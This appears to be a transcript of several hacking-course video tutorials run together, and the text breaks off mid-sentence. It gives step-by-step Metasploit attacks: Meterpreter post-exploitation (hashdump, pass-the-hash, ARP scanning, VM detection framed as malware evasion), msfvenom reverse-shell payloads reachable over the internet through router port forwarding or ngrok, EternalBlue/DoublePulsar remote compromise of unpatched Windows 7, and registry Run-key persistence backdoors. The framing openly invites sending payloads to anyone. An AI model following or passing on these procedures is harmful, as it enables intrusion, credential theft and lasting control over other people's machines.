Hello everybody and welcome back, and right now let us see some of the post-exploitation modules that you can run after you fully exploit the target. So in the previous videos we saw how we can gain and access the system privileges in Windows 10 machine. And we also saw how we can actually prevent anyone from doing that on our own machine. But right now, let us see some of the post-exploitation modules that we can use. So right here, if we type here sessions, I have two sessions. One of them is the 4 and one of them is the 5. The 5 one has the system privileges. Well, not yet, but the get system command will work on the 5 since I use the thought helper exploit. And the 4 one we can close since that is the first session that we have open. So sessions.i4, and we can exit that. Now we clear and we enter the sessions -i5 get system. I already covered all of this, and right now if I type here get UID, we are the system privilege account. So first of all, there is a module that is called sniffer, which allows us to basically sniff packets from our target machine. The Meterpreter has the capability of packet sniffing the remote host without basically ever touching the hard disk. It is useful when we want to monitor what type of information is being sent, and even better, this is probably the start of multiple auxiliary modules that will ultimately look for sensitive data within the capture files. Now, the sniffer module can store up to 200,000 packets in a ring buffer and stores them in a standard pcap file format, so you can process them using Wireshark later on, for example. So once we exploit the target, basically what you want to just type here is use sniffer, and it will say loading extension sniffer success. So all we want to do right now is to check our available options with the help command, and right here at the bottom we will see that it added the sniffer commands, which is sniffer dump, sniffer interfaces, sniffer release, start, stats, and stop. Now, before we begin the sniffing, we actually want to see the available network interfaces on the target. So if we just type here sniffer interfaces, let me just see, sniffer, why is this the incorrect function? Copy. Sniffer interface operation failed, incorrect function. Let me just type here sniffer dump, or sniffer, and then maybe this. So it doesn't want to work, not really sure why. Thought it would work. Let me just type help once again and type sniffer interfaces. Okay, so this one doesn't work for some reason, but luckily we have an alternative for this. So the alternative is the packet recorder, so we will just type here run packet recorder, and it will run a module packet recorder for us. As we can see, it basically even gives us our available options at the start of it. So Meterpreter scripts are deprecated, try post Windows OK. So these are just some of the errors, or not errors, some of the options that we can do. Now below we have the commands list, so what we want to do is check the running interfaces, something that we tried with the sniffer command, but it simply didn't work. So let us try with this one, maybe this one will work. So packet recorder minus, I believe we should specify LE, specify the alternative order to save pcap files, and interface ID number where all packet captures will be done. So it will show us, I believe, our available interfaces right now. Meterpreter scripts starting from interface 1, error starting packet capture, operation failed, incorrect function. Not really sure why it gives us these options. Maybe I am specifying something incorrectly. The -LE. Oh, so it's the capital L. I remembered it to be the -LE, so the capital L is actually the listing of interfaces that can be used for capture. But it still says incorrect function. since we can see right here it actually uses the sniffer interfaces function, that's why it doesn't work. That's why this one doesn't work as well. Now you can try on your own PC, maybe this will work for you. Basically what you want to do is basically select first the interface and then start sniffing in the .cap file. Then you can see all the packets that the target processed in the current time in the .cap file that you saved it via Wireshark. But right now we won't really bother with this anymore. What we want to do is basically use a module that, for example, works, such as, let's say we want to run an ARP scanner on the target. So run, the module is called post windows gather and then ARP underscore scanner, and then we want to select the R hosts which we want to scan, and let's say we want to scan 192.168.1.1 and then 224, which will basically, I believe, scan all of the hosts and their MAC addresses. It will print us everything that is currently on our local network. As we can see, ARP scanning is running and it found out these 5 devices. Now, I believe there won't be really any more devices. These are all that are currently on my network. As we can see, the Huawei router right here, my laptop, which is at 1.15, Windows 10 machine, this is Kali Linux machine, and this right here, I have no idea what it is. Yeah, this is the another interface for our Windows 10 machine. So this is the wireless interface for Windows 10 machine. Good. So this is another useful thing if you want to see the devices on the target's network. If you are not on the local network, you won't be able to see other devices in case you're doing this attack over internet. So this is just a local attack for now, and I will show you later on how you can port forward and actually run this attack over the world if you want to, in the other continent, for example. Now let me just see if this is finished. We will close it since it doesn't seem to finish. Maybe it just takes a lot of time to scan all of the 255 hosts. But the next module I want to show you, let me just background this and clear this a little bit so you can see it a little bit better. So the next module I want to show you is an imported one. It is used many times by hackers in malwares where they want to check if the current malware or current virus is running in the virtual machine. Now, why does this function exist? Well, basically, hackers want to run a function that will check if the virus has been opened in a virtual machine, since that will probably mean that someone is trying to reverse engineer that virus and uses a virtual machine to do that. So then the virus, for example, once it sees that it is actually running in a virtual machine, it just decides not to run anymore, and then the user that actually tries to reverse engineer the malware can't really see what the malware is doing, since it refuses to run, since it saw that it is in a virtual machine. Now, in order to check if your target is running on a virtual machine, you can just run post windows gather and then check VM, which checks virtual machine. And this will check if our Windows 10 is a virtual machine, which it isn't. As it says right here, desktop appears to be a physical machine. So this means that our target is not running Windows 10 on a virtual machine, which is correct, since we are not. The next one, which could also be useful, is the credential collector. It will basically give you the hashes of the accounts on the Windows machine. So the module is called run, so just type here run. Basically the run command just runs the module that you specify after that, and then post windows, since we're on the Windows machine, gather, since we're gathering some credentials, so we specify credentials. Let me just see why it, okay, and then credential underscore collector. And hopefully this will print out all of the hashes for our accounts. So, running module error accessing hashes, did you migrate to a process that matched the target's architecture? What do you mean by that? Did you migrate the process? But we can try another one, which is basically giving us the hash password of the administrator, I believe. So it is called, let me just check, I believe it is called something like this. So post windows gather. Now most of these post exploitation tools will start with post windows gather, and then what to do is hash dump. Let's see if this one will work. Obtaining the boot key calculating the HP, obtaining the user list and keys, okay. And this one did work. We were able to get the hashed passwords. Now, for example, you can then copy some of these. You can, for example, copy the administrator, so just copy this one right here. And you would be able to use another module in Kali Linux called the PS execute, which is also a Metasploit module, in order to set the SMB path to be this hashed value right here, and you would be able to exploit over port 443 with the SMB path. So you just set this hashed value as the SMB path in that module, and you will be able to get another Meterpreter shell with that. So that is also a useful thing to do. The next thing that you want to do is basically another module that we can run, which is basically you can use the dumplings module, which is basically it parses the .ink files in our user recent documents, which could be useful for further information gathering, for example. So in order to do that, you can just type here run post windows, and then you can just type here gather dumplings. I believe it is like this. So you just run this and it will give you all of the specified message could not be found. Post windows gather dumplings. Okay, so it doesn't matter. It is not that important of a module anyway. We will not be bothering ourselves to find it right now. What we can do is we can see all the applications that are installed on a compromised host. So you do that with this module, run post. Yeah, and this is probably the reason why it didn't work. I specified the slash in the front, which I shouldn't have, but it doesn't really matter at the moment. We'll just go to the next one. So post windows gather, and then enum applications. And this will print out all of the applications installed on the host that you have hacked, which could be useful for you in order to see what the host has up and running and what the host has installed. So we can see there are a bunch of these. Since this is a real machine that I used before, we can see WinCap, WinRAR, bunch of the Visual Studios, and so on and so on. Now I'm not really sure what these numbers right here are. Oh, this is the version, so it even gives you the version of the programs running, so we can see a bunch of Python versions, OpenOffice, Razer Cortex, and a bunch of these different applications. Another post-exploitation module that you can use is the enum logged on users, which returns a listing of current and recently logged on users along with their SIDs, which could be useful for you. So you just type here run post windows gather, and then enum underscore logged underscore on underscore users, and this should print out all the users that have recently logged in. So running, I guess, session 3, we can see right here that the one of them is a system and the one of them is the user account. So it even saves this into a file at this location right here, so root and then the Metasploit 4 and then here, so you can delete it if you want to. It even saves the file right here at this location, at this path. You can check it out in there if you want to, or you can delete it. So that would be about it for this module for now on. Now in the next video I will show you how you can actually run the same attack that we did right now over the internet. So this is only a local area attack. What you want to do is do a port forwarding on your router and actually perform the same attack. So I will show you how to do that in the next video, and I hope I see you there. Hello everybody and welcome back. And now in the previous videos we have seen some of the post-exploitation modules that we can run against the target. Now those are just some of them. You can run basically a bunch of others as well, which we will not cover since there is no time for that. If you want to, you can check them out at the Metasploit modules basically directory, or you can just search post in the Metasploit framework console command. If you just open it right here with this, I will open it since we will need it, since in this video I will show you how you can do the attack over the internet. But before I do that, let me just show you how you can search all of the post-exploitation modules. Now basically once this opens, you just search post then /Windows, and it will give you all of the post exploitation modules that you can use on Windows. So just type here search post/Windows, and it should print out all of the, let me just zoom it out once again, all of the modules that you can use on the Windows. These are all post exploitation modules, as it says right here with post, and you can use them if you want to. For example, this could be interesting to you if you wanted to check out the USB history. So we, for example, know that the USB that we plugged in before should appear in there. Now I don't have a session open, so I won't be running that exploit, but you can check it out if you wanted to. But more about that later on. What we want to do right now is perform a port forwarding in order to be able to do this attack on any PC in the world. So how we do port forwarding? Well, open up your Firefox. You would need to access your router, so you need to know your router's username and password and enter it. And after you do that, basically you can just find the port forwarding section. So let me just show you. You just check out your router's IP. In my case, my router's IP is .1.1, and I just click on it. It will prompt me with a login screen. So I just type my username and password. We do not want to save it. And now, since everyone's router is different, what you want to find in your router is basically the port forwarding section. Now I'm not even sure where is it in my, it should be somewhere in the, not wireless, it could be on the NAT. So NAT port forwarding, I found mine. And here you have a set of rules that you want to specify in order to perform a port forwarding. So rule index, not really that important. Application, not important. What is important is the, well, this isn't really, no, not this thing. The protocol under that is important, so you want to send TCP right here. The start port number you want to set to the port that you want to forward. So let's say we want to forward 55555, and port number should also be 55555. Local IP address is the IP address of your Kali Linux machine, which currently, if I run ifconfig, is the dot, let me just find it, is .1.4. So we just type here your local IP address, you check it out with the ifconfig command, and then you specify it in the local IP address. Then the start port local can also be 55555, since these are the same options as well as the previous ones, which are the start and the end port. So once you select the port number that you want to port forward on your local machine and the IP address of your local machine, as we can see right here, what you want to click on is submit, or basically whatever it says for you. So once we submit, we can see that right now I successfully made a port forward for this IP address on this port, which is good. Right now that we port forwarded, the only thing you want to do right now, which is different from the previous attacks, is basically change the IP address of the local host in the MSF Venom payload creation into the global IP address, or basically into your public IP address right here. So if you just type here, what is my IP, it will print out what is your public IP address, as it says right here, which currently for me is this one, and only thing you need to do is specify in your payload creation under, instead of the lhost to be your local IP address, which is .1.4, you want to specify this IP address right here. So let me show you how to do that. If you just go right here, change root, we check the print working directory, and we create the payload. So MSF Venom -p, we want to use the same Meterpreter, or the same payload as before, so Meterpreter reverse TCP. And right here, lhost equals, instead of specifying local IP address, what you want to paste is your public IP address right here. The L port, you want to set the L port to the port that you forwarded, which in our case is 5555. In your case, if you specify the different port, just use different port instead. So L port equals 5555, and then after that we specify everything the same, so file.exe, and then we want to specify it to be, let's say, vanshell.exe. So we wait for this to create our own payload, and after it creates this payload, what you can do is basically you can send it to anyone you want. You can send it basically to a different continent on some other PC, and what that PC will do, it will perform a public IP connection, and it will try to connect to this IP on this port, and our router, since it has a rule that this port is forwarded to the .1.4 local IP address, will forward this connection to our Kali Linux machine. So now if I type here ls, we can see that the vanshell.exe is created, and all I want to do is plug in my USB drive, so Kingston Data Travel, or you can actually do it over Apache too if you want to, it doesn't really matter. And what I want to do is copy vanshell.exe, vanshell.exe into, well, let me just do it like this, so since I need to specify it in a regular terminal. So what I want to do is basically copy vanshell.exe into my USB drive. You can do it manually, or you can do it with the command like this. And now we have our vanshell here. So after we do that, we just turn off the USB drive, we unmount it, we also uncheck it right here, so it goes to connect to our Windows 10 machine. And after that, what we want to do, let me just see if it will pop up right here, or I have to re-plug it in. So let me just do it like this. It is not popping up, it doesn't matter. What we will do is we will just go right here, and here is the vanshell. I put it on my desktop, and what I want to do is basically specify a listener right now, same as before. So we use exploit multi-handler, set payload to be the Windows 64-bit Meterpreter, reverse TCP. Now I'm going over this fast since I already covered it. Oops, I made a typo, so Meterpreter. And now show options, we can see everything is set except lhost, so set lhost to be your local IP address right here. And what you want to do is just type here exploit jz, it will run it in the background, and if we run this right here, you will see that in a few seconds we will get a reverse shell back. Whoops, the reason why we are not getting it, I just noticed right now, is because I specified right here the L port to be 4444 instead for it to be 5555, which is specified in the port forwarding rules. So let us do this once again. Use exploit multi-handler. Let me just see jobs. So I killed this job that I ran. So I killed the first listening on port 4444. And I show my options. Let us see if everything is set. And now we want to change the L port to be 5555. So now that we did all of that, now we can exploit JZ. We can run the Meterpreter, or pardon me, run the listening. And now if we run this, we get the connection from our Windows 10 machine. And now this will work for any machine on the world. In the world. So basically wherever that machine is, it will be able to connect to you, since we port forwarded our port to router, and we can see right now we are not even getting the connection from a local IP, we are getting connection from the public IP. As we can see, if I go sessions -i1 get user ID, we can see that we successfully were able to exploit a target machine that is not on our local network, even though my Windows 10 machine really is, but the process is looking like this. So with this process you will be able to connect any machine in the world. So that would be about it for this tutorial. I hope you enjoyed it, and I hope I see you in the next one. Bye! Hello everybody and welcome back. And finally we get to the eternalblue exploit developed by NSA. Now, as I said before, this is an exploit for Windows 7 machine, so you will need to download the Windows 7 machine first. Now, the link where I downloaded it from is this one. I will just type it right here, so you can use the same link. It comes with the both 64-bit and 32-bit version. You can download any of those you want. Now, I will not be going through the installation of Windows 7, since it is rather simple. You just follow the steps and it will work for you. The link where I downloaded it from is this one, so https / then bit.ly/2wpp and if you go to that link, let us just let this load. It should give you an option to download both 64-bit and 32-bit Windows 7 operating system. So here it is. As we can see, it will lead you to this page right here. You just scroll here down and you choose each one or either one of these two. It is the size of 3.09 gigabytes or the 32-bit version is 2.38 gigabytes. Now in this tutorial I will use the 64-bit version of Windows 7, but both of these will work as well. Now, if you have, for example, a VirtualBox machine with the Windows Server 2008, that one will work as well. So, let's see how to get this to run. So, what you want to do, let me just zoom this in. If you go to the MSF console, you will see that there actually are already some eternalblue exploits in it. But what we want to do is actually download one from GitHub, since that one will actually allow us to get the Meterpreter shell back. There is a one called the eternalblue in the Metasploit framework as a module. Basically comes pre-installed, but that one only gives you back the command shell. It doesn't give you back the Meterpreter shell with all bunch of options that the Meterpreter comes with. So we want to get the most of it, so we will download the eternalblue double pulsar on GitHub and we will add it to the Metasploit framework database and we will be able to use it. So if I search here, search eternalblue, you will see, now I need to unzoom this so it doesn't look this ugly, you will see that we have two auxiliary modules right here. One of them is a scanner, so basically it will scan the machine and check if the machine is vulnerable to the attack, and these three right here will actually attack the machine itself. So the first one works on Windows 7, the second one, well basically this one, it says if I use the eternalblue Windows 8 edition, copy and paste it, and I show targets for this, it says Windows 64. Now if I show info as well, it will say that this also works on the Windows 10, which I highly doubt. As we can see, eternalblue exploit for Windows 8, Windows 10 and Windows Server 2012 by Sleepia. The exploit might fail and crash a target system depending on what is overwritten. The exploit support only x64 target tested on Windows 2012. So it is tested on Windows 10, Windows 8.1 and Windows 2012. But if you notice, show options, I might be doing something wrong, but the only required spot right here is set rhost 192.168.1.3, which is the IP address of my Windows 10 machine. Let me just check it out real quick. So ipconfig, and we can see that .1.3 indeed is the IP address of my target machine. Now, as it says right here, this exploits on port 445, which by the installation of Windows 7, for example, already comes open by default. So most of the targets that actually didn't update their Windows 7 will still be vulnerable to this attack. Now, about Windows 8 and Windows 10, I'm not really sure, since, for example, if I show you -SV -P445 on my Windows 10 machine, if I nmap it, it will say that the port is open. It will give us the version, so the port really is open. But this exploit right here probably only works for the almost never updated Windows 10 machines. Now I have the 445 port open, but if I just run here exploit, let me set the payload first. So payload Windows x64, since my target is 64-bit, Meterpreter, reverse TCP, and I run this on, and let me just check show options in order to see. I need to set lhost. Lhost is the IP address of us, which is ifconfig, which is the .1.4, and I run exploit. You will see that this won't really work. As it says right here, this exploit does not support this build. So this exploit right here is only for this certain type of build. It will not work on some Windows 10 machines. Well, on most of them it will not work, especially on those that regularly cover their updates. So you can check these several eternalblue exploits right here. Let me just search them once again. Search eternalblue. You can check them if you want to, but what we want to do right now is download the extended one that will give us the Meterpreter shell. So let us do that right now. Go to the Firefox, and what you want to go right now is search, basically, on the Google search bar, eternalblue double pulsar GitHub, and it will lead us to the first link, which is this one, 11pass/eternal double pulsar metasploit. We want to download this module into the /root directory, so make sure that it is downloaded in the /root directory. We will do that right now. What you want to do is do the same thing as with every GitHub program that we use. So just copy the link. We will lower this. Then we go to the cd root. We print working directory in order to make sure, and we git clone, and then the eternalblue double pulsar.git. And this will clone the program for us in our repository. Make sure that it indeed is in the /root repository, since it by default in the settings it will check out for that path. Now I will show you that later on, but for now on just make sure that you downloaded it from the to the root directory. So if I just type here pwd, it is root, and ls, we can see that right now we have the eternalblue in that repository. Now the next thing you want to do, and for that I will just leave the Metasploit for a second. So what you want to do is find your Metasploit path. So your Metasploit path, so just type here locate Metasploit framework. Now it is in the user share, I believe. Yeah, it's in the user share. And what you want to do, once you find it, you want to copy the 2 packets from the eternalblue. So let me just change my directory to the program that we downloaded. You have this subdirectory right here, and you also have this right here. What you want to do with these 2 is you want to copy them to the modules in Metasploit framework, to the exploits, then to the Windows exploits, then to the SMB exploits. So let me just show you what I mean. What we want to do is first change our directory to the user share Metasploit framework, then ls cd modules, change to Windows, to exploits first, then change to Windows, and then SMB. And right here we have all the modules or all the exploits for the SMB protocol. As we can see, there are the other eternalblue protocols right here. Here they are. And what we want to do is we want to add these 2 files right here to this directory. So we just copy /root /eternalblue, which is the path to our program. And let's first copy the directory. We want to copy it to user share Metasploit framework modules exploits, and then to the Windows, and then SMB, and -r for the directory, so it copies the directory. And if I just type here ls once again, you can see it is right here. And we also want to copy, so let us use the same command, but instead we want to copy the eternalblue _ double pulsar .ruby. So we copy that one as well, and we can see now they are both in this directory. Now we will be able to access them within the within the Metasploit framework command line or MSF console. Now before we start with that, you need to make sure for one more thing that is running, and that is the Wine. The Wine program. If you don't know what Wine is, I explained it in some of the previous videos. I showed you how you can download it, and we also downloaded Python with Wine, so make sure to check out that video if you do not have it. The Wine path is to, let me just close this so it doesn't bother us. So the Wine path is to root.wine and then drive C. As we can see, if you remember from the previous videos, this is the path to our drive C folder, which is the virtual Windows C folder, which has basically Windows files, as we can see, program files, x86, and program files. Now, this is also important to know your Wine path, since we will need to specify it in the attack, in the target attacking. So right now that we did all of that, what you want to do is change to root first of all, and then run MSF console. Now we should be good to go, and we should be able to use the eternalblue double pulsar exploit. So you will see how powerful this is. First of all, what you want to do is, in case you didn't, you want to install the Windows 7 first, since this only works on Windows 7 and Server 2008. I already have it installed right here. I followed all the steps, and also make sure that after you install that, or not after, towards the end of the installation, it will ask you for the security measures of the Windows 7. Make sure to add non-security measures and to not update it, since if it performs all of the updates, it will perform the update for the eternalblue as well, and then this will not work. So make sure at the end, it will prompt you with a question at the end asking that. You just make sure to not update at all, and you will be good to go. So I will just start up my Windows 7. Hopefully nothing goes slow, because I'm running two virtual machines. Right now I gave this one around 1.5 gigabytes of RAM. So we will see how that will go. I do not have passwords, so we will just let this log in. And while that is doing, we want to search exploit Windows, since that is the path that with SMB and eternalblue double pulsar. As we can see, if you tab it, it will automatically find it, since we put it in the correct folder, or in the correct directory, which is the SMB directory under Windows under exploits. So just click here, enter, and if we clear the screen and show our available options, we can see the things that we need to specify in order to run this. Now make sure to notice that all of this is required, so all of these specifications are required. This is the reason why I told you that you copy the path into the root directory, since this is already preset for the root directory. Now you could have changed it, but it doesn't really matter at the moment. We have eternalblue double pulsar in the root directory, which is good. If we just check that, so pwd, we are in the root directory, ls, and it still really is there, so that is good. Now let's show our options once again. The next thing you want to specify is the project process to inject. Now if you downloaded the 32-bit Windows 7, you should leave this process like this. If you have a 64-bit Windows 7 version, you should change it to the lsss.exe or to the explorer.exe. But the difference between these two is that the explorer.exe won't give you the system privileges during the exploitation. So we want to actually use this one right here. As it says, it is for the 64-bit version. So we set process inject, and then we copy the process name, and then we paste it. So it will set the process for us. As we can see, show options, the process is currently set. The rhosts is basically as same as in all the previous exploits. It is basically the IP address of your Windows 7 machine, so we will check that out right now. We have Windows 7 right here. If I go there and type cmd for the command prompt, it is a little bit slow since I'm running two machines at the time, but we will get used to it. So I just type here ipconfig right here. The IP address of the Windows 7 machine is .1.5. So we need to know that. Set rhosts 192.168.1.5. Now that we set that, the next thing we want to change is the target architecture. The R port should stay on 445, since the SMB service port is 445, but the target architecture we want to change in case we downloaded the x64-bit version. And we did, so we want to type here x64 instead of x86. Now if you download once again the 32-bit version, you should leave this on x86. So set target architecture x64, and let's clear the screen and show our options once again to see if everything is good. The wine path is correct since our wine is stored in root /.wine/drive-c. Now the targets, let's see, show targets. It will say that the targets are all Windows basically versions until Windows 7. So we can see that we have Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008 and Windows 7, all packs. So we select the target, so select or set, or is it set target 8, I believe it's something like that. Or show targets, set targets, or possibly select targets. Now I don't even know, I maybe forgot this. Let's see this one. Okay, it doesn't even matter, so I don't know the syntax for this, but it is not really needed for us to type that in order for this to work. So show options. Basically it is already set for the Windows 7, I don't know why I tried that. And right now we should be good to go. But one more thing to do is to set the payload. Now be careful, since the payload for Windows Meterpreter reverse TCP will not work here if you have a 64-bit Windows 7 that you are attacking, but if you have a 32-bit Windows 7 that you are attacking, the Meterpreter reverse TCP will work. For the 64-bit we need to set the payload to be Windows x64 Meterpreter and then reverse TCP. Since we are attacking Windows 7 64-bit, we need to have the Windows 64-bit Meterpreter shell. So show options, and we set the lhost. So lhost is our IP address, so 192.168.1.4, I believe. We clear the screen and we run the attack, so exploit, and we let this run. As we can see, this is the entire attack, and just by typing exploit we should be able to get the Meterpreter session back. It is launching the attack, as we can see, launching eternalblue, so this will take a few seconds. The attack is basically writing DLL in this root wine/drive-c eternal.dll, I believe, eternal11.dll, and right now we should be able to get the Meterpreter shell back. Here it is. Launching double pulsar, we got the session back. Now, if you notice right here, if I just type here get UID, you will see that basically we got the session to be system. So we, with a simple exploit command, without the target having to click on anything or download anything, we were able to exploit the target. So with this exploit you can exploit any target that is currently connected to the network that didn't update in Windows 7 for a long time. Since this exploit is from, I believe, April 2017, anyone who didn't perform updates since then, and trust me, there are a lot of people who didn't, you will be able to exploit them with the authority system privileges. And right now you can do basically anything that we did in the previous video. So for example, if you wanted to, you could just, let me just move this to the side, you could just shut down their PC or perform persistence or something like that. Now let us actually perform the persistence. I'm not sure why this got, it doesn't even matter. What we will do is we will shut down their PC. So shut down, and you will see that this basically will shut down their PC. It will kill our Meterpreter session, of course, but we don't care. We can exploit the target whenever we want. Since the target doesn't have to click on anything, we basically can just do whatever we want to the target. So just click here exit, and we should be good to go. Now, in the next video I will show you how you can create a persistent Metasploit or Meterpreter reverse shell running on a target PC. Now by persistent I mean that whenever the target restarts their system, you will be able to connect back to them as soon as they log in. So that would be about it for this video. I hope you enjoyed it, and I hope I see you in the next one. Bye! Hello everybody and welcome back. And now let us start off by actually running the persistent on our target machine. So I'm starting up right here Windows 7, and let's start Windows normally since I had a problem running it a few seconds ago. And right now what we will try is we will try to actually run a persistence backdoor on the target system, which would actually allow us to connect to it anytime we want. So basically, if you have noticed, once we get the Meterpreter shell and if we reboot the machine, we will not be able to connect back to the target. So target could actually prevent us from exploiting their computer or actually gathering some information after we get the shell open by just shutting down the PC if we didn't run the persistence. So the persistence is something that you want to run at the very beginning of exploitation, right after you get the Meterpreter shell. That is most likely the first thing you want to do. So let us see how we can do that. So I opened up my Windows 7 machine. It is working normally. Let us just check out once again its IP address. So it should be .1.5, I believe. IP config. And it really is .1.5. So right now let us go to our Kali Linux machine. And right here we have the Metasploit open, and what we want to do, basically, let's perform the previous exploit real fast. So pardon me, we want to use exploit, Windows, SMB, eternalblue, double pulsar, show options. We want to set our hosts to 192.168.1.4, set target architecture to x64 since Windows 7 is 64-bit, set process, inject to this file, we paste it right here, we set payload to be Windows x64 Meterpreter reverse TCP, set lhost at the end to be 192.168.1.4. Pardon me, our host should be the IP address of the Windows 7 machine, so let's change that. So set our hosts 192.168.1.5, which is the IP address of our Windows 7 machine. So show options, and right now we should be good to go. So just run here exploit, and we should get a Meterpreter shell with system privileges on target system. So after we do that, we will load a module called persistence, and we will actually try to get the Meterpreter shell back even after we reboot the Windows 7 machine. But before we do that, we need to wait for our session to open. So I hope it will do it real fast. So let's see. Launching eternalblue. We specified everything correctly. Timed out, waiting to select notify event. What do you mean by that? But we did get the shell back, so it doesn't really matter. Get user ID, and we are system. So not really sure what this error right here is, but we were able to get the system. So print working directory, we can see that we are in C Windows System 32. Good. Now after we actually exploited, now let's run the persistence. So we run it with this command. So run persistence -h to see our available options. We just see usage run executes a Ruby script or Metasploit post module in the context of the Meterpreter session. Post module can take. Okay, so it doesn't give us the module options, but it doesn't matter. I will just type here the command and I will explain to you what it all means. So let us run the command. So what you want to do is run persistence -u, which basically stands for automatically start the program or our reverse shell when the user logs on. Now you can also use -x, so when the user, when the system boots, you can use that. So -x is automatically start the agent when the system boots, and -u is automatically start the agent when the user logs in. We will use -u in this case. Now we will use -i for the interval between each connection attempt. So for example, let's say we weren't able to actually set up our listener at the correct time when the system was booted, and we missed the first connection try. So we want to set this to try to connect to us every, for example, 10 seconds. So let's type here 10 seconds, so we can actually connect anytime we want while the system is running. So the thing that we want to specify after that is -p for the port, and let's use port 443. And of course, after that you want to use -r, which is the remote address of the, basically this is our IP address. So this is the IP address that the target machine will try to connect to, which should be the IP address of your Kali Linux machine, which in my case is .1.4. So after you do that, you just click here enter, run persistence, and we specify the entire command right here, and it will run the persistence for us, and it will create a registry key in the registry key folder. So we can see right here. Let's actually analyze this a little bit. So what this did is basically persistence script written to this path right here. So in temp we got the .vbs script, which is with a weird name, and basically what this VBS script is basically just a copy of the Meterpreter shell in the temporary folder, and it also created a registry key in the current user registry in the run startup folder, and it named it like this. So basically what this registry key does is that every boot up it will run this program, which is our Meterpreter shell. It will also try to connect every 10 seconds. So now that we actually ran the persistence, let's actually reboot the machine and see if it works. Now while you reboot the machine, you need to actually set up the listener. Since our eternalblue double pulsar isn't really a listener, we need to set up a regular use exploit multi-handler and then our regular listener. So let's reboot the machine, and we can check out the machine really is shutting down, so it is rebooting or restarting. And while we do that, we want to exit this, and we want to use exploit multi-handler set payload to be the same payload we specified in the exploit. So Windows x64 Meterpreter reverse TCP, set L host to be 192.168.1.4 and set L port to be 443, since L port 443 is something that we specified in our persistence command. And now we type exploit, and we are waiting for incoming connections. And it should prompt us with a Meterpreter shell as soon as this Windows 7 machine boots up. So let's wait for it to connect to the internet. And in just a few seconds we should be getting the Meterpreter session opened. We still didn't get it. No idea why, but it should come soon. No idea why we didn't get it. We should have got it, so we can check the registry in this Windows 7. So let's go run, and then let's open regedit right here. In order for us to open the registry folder, let's go to the registry where we saved our files. So current user, software, Microsoft, then we go to the Windows, I believe. Okay, so Windows, current version, and then run. Value not set. So we were not even able to set the value for it. Now, why didn't it set? I have no idea. Let us try it once again. So let's close this. Let's actually use the same thing as before, which is the use exploit multi-handler double pulsar, show options. So we should already have everything as sets, and exploit this. And let's see if I run the same command in the Meterpreter, will we get the registry key right here. Let's actually check in the CMD, so change app data. wait, let's just wait for this to open. It should have written us a registry key, not really sure why it didn't, but we will try to fix that right now. So we got the Meterpreter session open with eternalblue double pulsar, and what we want to do is actually run the same command as before. Run persistence as user logs in, or let's actually type as system boots, interval 10 seconds, remote address to be this one. And hopefully, right now, if we refresh this, so it created at local machine. So now it is created at local machine. So let's see if it is there. It should be named like this. So this random letter. So let's go to the local machine, to the software, to the Microsoft, to the Windows. It is basically the same path. You just find where Windows is. Okay, so Windows, current version, and then the run folder. And let's see if it is there. And here it is. So right now, this did work. So let me just see right now if we reboot the PC right now and exit the session and set up our handler once again. So multi-handler, show options, and we exploit since everything is already set. So the IP address set, the port set, and we run this. Now the problem could be is that this puts in the temp directory, which I think we can change, but basically this is the idea of the persistence. We can actually specify the directory as well if we wanted to, so we do not need to put it into temporary directory. I'm not really sure if temp directory actually deletes all the files at the reboot. So let's see if we open up the run once again. So run, and then regedit. We go right there. We want to open that. We go to the local machine, software, Microsoft, to the Windows, I believe. Should be Windows. Okay, so it is all the way down. Windows, current version, and then the run right here. And we still have it right there, so not really sure why this doesn't work, why it won't open the file. But basically this is the simple idea behind this. Now I tried this yesterday on Windows 10 and it does work, so maybe it's some problem with the Windows 7, it doesn't even matter. Now the point is that this basically that this is the process of actually making a persistence, so you should actually be able to use this on Windows 10, for example. Not really sure why it doesn't work here. I will actually check it out and maybe tell you in the next video what the problem was, if there was any problem. And that would be about it for this tutorial. I hope I see you in the next one, and take care. Bye. Hello everybody and welcome back. And right now, before we continue, I just want to show you an alternative to the port forwarding attack. Well, basically the attack over the internet. Now, let's say for example you are on a cafe Wi-Fi and you do not have the access to the router, and you for example want to port forward or actually be able to attack anyone in the entire world over a link or over something like that. You can't really perform the port forwarding since you do not have access to the router, so you need to have the alternative for that. Now, the alternative is a program called Ngrok. Now, Ngrok, I don't think it comes pre-installed in Kali Linux. We will not be installing it since that is only an optional. I already have it installed on my laptop. If you want to, you can just go onto your Firefox and just search installing Ngrok, basically commands or something like that, and I believe it is rather easy to install. You would probably need to make an account on their website in order for this to work, but I believe you will do that very easily since I don't remember having any problem during the installation of this program. So you just go Ngrok, download, and then you can actually find it somewhere, either it being on the GitHub, as we can see right here, or you can go onto their official website and actually download it from there. Now this is also something you can run both on Linux and both on Windows, so that's good to know as well. So once you download that, you will have probably an account, and once you do that, just type here ngrok --help. I believe it has help options, okay, so it does have --help. And basically what you want to do is actually perform a port forwarding with this tool on their website. So what they allow you is to have an open port on their website. When someone connects to their website over some open port, that will forward the connection straight to you. So their website actually acts as a router in that case, as a port forwarder for our own machine. As we can see some of the examples right here, Ngrok HTTP 80 secure public URL for port 80 web server. So if you were to example run this, you would be able to give access to your Apache 2 web server to anyone in the world, for anyone that actually types the link with your open port. Now you might be asking, well, isn't that the same as hosting, and how does this come for free? Well, the free version actually changes your port every time you restart the Ngrok, so you will not be able to have a static address for this, but you can pay in the, I believe, professional version or something like that, where they actually allow you to have the same port every time you run Ngrok. But right now what we want to do is actually type Ngrok TCP, and then we want to use the port that we want to forward in our Kali Linux machine, or basically in my laptop in this case. So let's just say port 5555, and then when we run this, you will see that it will actually try to connect to their web server, and soon enough I believe it will give us an open port on their website. So reconnecting, it will give you some of these timeout sessions, but don't worry, I believe in a few seconds that this will perform a full connection to their website. So let's wait for that to happen. And here we are, we can see that we are currently online. So the few things that we have right here is the session status, which is the status of our currently web server, or not web server, our open port. The account that I made when I was making the Ngrok was this one. As we can see, it is plan free, which means I do not have the premium version. Update available, doesn't matter the version, the region, United States. The forwarding is done on this link right here. So this is the link, and this is your port that they used in order to forward your connection. So it is forwarding it to our local host at port 5555. So with this you do not need to actually port forward anything in the router. You can just bring your laptop anywhere and perform the attack over the entire internet. But right now there are a few things also that you need to change while running this. So let's open another terminal right here, and let me change my directory to the desktop directory. Now let's say we want to make a payload, and we want to make that payload connect back to us. So what we want to do is msf venom -p, and let's create a simple Windows Meterpreter reverse TCP. And now in the L host you would want to specify this. So you would want to specify this link right here, so 0.tcp.ngrok.io. Now that, I believe, link it will be the same for everyone, so you just specify that link. And what that will do is when the target that you send this file to runs this, it will connect to their website on this port. So you need to set the 